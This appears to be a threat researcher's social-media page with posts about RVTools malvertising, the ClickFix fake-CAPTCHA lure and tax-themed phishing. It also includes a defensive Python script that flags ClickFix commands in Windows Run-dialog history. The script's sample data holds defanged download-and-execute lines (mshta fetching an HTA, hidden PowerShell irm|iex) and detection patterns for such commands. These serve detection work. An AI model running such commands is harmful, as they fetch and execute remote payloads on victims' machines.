Tommy M (TheAnalyst)

Threat Researcher @proofpoint | @Cryptolaemus1
twitter.com/ffforward

Tommy M (TheAnalyst) @Ffforward@infosec.exchange
2025-05-19

This article, which is starting to get traction, claims that the official RVTools website was distributing a malicious installer leading to Bumblebee. I see zero evidence of this actually being the case.
There are, however, at least two separate current malvertising/SEO campaigns, one leading to Bumblebee and one leading to SMOKEDHAM/Thundershell, but neither is from the official website.

Tommy M (TheAnalyst) boosted:
2024-11-18

⚠️ Proofpoint researchers have identified an increase in the unique #socialengineering technique called #ClickFix. ⚠️

The technique is being used by financially motivated threat actors and reportedly by suspected espionage-focused groups.

Read the security brief: ow.ly/WYXX50U9eZq

---

How the lure works: The #ClickFix social engineering technique uses dialogue boxes containing fake error messages to trick people into copying, pasting, and running malicious content on their own computer.

Notably, we've observed threat actors using a fake CAPTCHA-themed lure that pretends to validate the user with a "Verify You Are Human" (CAPTCHA) check.

This activity leverages a toolkit named reCAPTCHA Phish, released by a security researcher on GitHub for educational purposes.

Just days after the open-source toolkit was released on GitHub, Proofpoint began observing it in email threat data.

See our security brief for several recent examples of the ClickFix technique in action.

Example of early ClickFix technique used by ClearFake.

ClickFix campaigns observed March through October 2024.

Tommy M (TheAnalyst) boosted:
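Because a ClickFix lure ends with the victim pasting a command into the Win+R "Run" dialog, Windows' own history of that dialog (the RunMRU key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer) is a cheap triage source for responders. The script below is an added example written for this page, not code from Proofpoint or from the post above; it runs the triage logic over a constructed set of RunMRU values rather than reading the live registry, and the URLs, hostnames and slot contents in it are made up and defanged.

```python
import re
from typing import Dict, List, Tuple

# Constructed RunMRU contents (not real telemetry). Windows stores each Run
# dialog entry as a REG_SZ value named with a single letter, with the data
# suffixed by "\1", and keeps most-recent-first ordering in "MRUList".
RUNMRU_SAMPLE: Dict[str, str] = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "mshta hxxps://verify-human[.]example/check.hta\\1",
    "d": "powershell -w hidden -c \"irm hxxps://captcha[.]example/v | iex\"\\1",
}

# Interpreters and living-off-the-land binaries commonly seen in pasted lures.
LOLBINS = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|rundll32|regsvr32|"
    r"msiexec|bitsadmin|certutil|curl)\b",
    re.I,
)

# Traits that, combined with an interpreter, separate a lure from normal admin use.
SUSPICIOUS_TRAITS = [
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-(e|ec|enc|encodedcommand)\b", "encoded command"),
    (r"\biex\b|Invoke-Expression", "inline execution"),
    (r"\birm\b|\biwr\b|Invoke-WebRequest|Invoke-RestMethod|DownloadString", "web download"),
    (r"h(t|x){2}ps?://", "URL in Run dialog"),
    (r"\.hta\b", "HTA payload"),
]


def parse_runmru(values: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (slot, command) pairs, most recent first, with the "\\1" suffix stripped."""
    entries = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        entries.append((slot, cmd))
    return entries


def score_command(cmd: str) -> List[str]:
    """List the reasons a single Run dialog command looks like a ClickFix paste."""
    reasons = []
    hit = LOLBINS.search(cmd)
    if hit:
        reasons.append(f"interpreter/LOLBin: {hit.group(1).lower()}")
    for pattern, label in SUSPICIOUS_TRAITS:
        if re.search(pattern, cmd, re.I):
            reasons.append(label)
    return reasons


def triage(values: Dict[str, str]) -> List[dict]:
    """Flag entries with at least two traits; a bare 'cmd' or 'powershell' is ordinary usage."""
    findings = []
    for slot, cmd in parse_runmru(values):
        reasons = score_command(cmd)
        if len(reasons) >= 2:
            findings.append({"slot": slot, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage(RUNMRU_SAMPLE):
        print(f"[{finding['slot']}] {finding['command']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

On a real host the same logic can be fed the output of `reg query` or a forensic registry export; the two-trait threshold is a starting point to tune against your own environment's baseline of Run dialog usage.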
Selena Larson @selenalarson
2024-01-30

New research from @Ffforward and myself looking at the return of TA576, a cybercriminal threat actor that uses tax-themed lures specifically targeting accounting and finance organizations.

They always pop up during tax season in the US and use lures with funny back stories (help! my last accountant messed up my taxes).

proofpoint.com/us/blog/threat-

Tax-themed lure purporting to request information for individual e-filing.
